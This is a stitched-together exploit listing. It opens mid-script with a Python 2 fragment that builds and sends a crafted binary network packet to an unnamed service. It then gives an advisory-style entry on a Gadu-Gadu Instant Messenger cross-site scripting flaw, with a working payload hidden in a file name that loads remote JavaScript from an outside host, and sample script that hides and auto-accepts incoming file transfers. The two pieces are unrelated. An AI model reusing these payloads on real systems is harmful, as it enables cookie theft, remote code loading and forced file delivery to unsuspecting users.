"\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00" packet1 += "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" packet1 += "\xc0\xa8\x00\x6b" #client IP address packet1 += "\xff\xff\xff\x00" #client subnet mask packet1 += "\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00" packet1 += "\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00" # client hostname packet1 += "\x00" * 480 packet1 += "\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80" packet1 += "\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00" packet1 += "\x00\x00\x00\x00\x00\x00" s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(packet1) print s.recv(1024) s.close()

source: https://www.securityfocus.com/bid/47957/info Gadu-Gadu Instant Messenger is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. file name that loads external x.js code: <input onfocus="eval(unescape('x%3Ddocument.getElementsByTagName%28%27head%27%29.item%280%29%3By%3Ddocument.createElement%28%27script%27%29%3By.src%3D%27http:%2f%2fasd.pl%2fx.js%27%3Bx.appendChild%28y%29%3B'));this.setAttribute('onfocus',0);" autofocus> example x.js code to hide, accept and open every file request: document.getElementById('extra').innerHTML = '<style>.file, .entrySeparator{display:none;}</style>'; n = document.getElementById('open_file'); n.setAttribute('id', ''); function ff(){ if(f = document.getElementById('open_file')) { e = document.createEvent("HTMLEvents"); e.initEvent('click', true, true); f.dispatchEvent(e); f.setAttribute('id', ''); } setTimeout('ff()', 1000); } ff();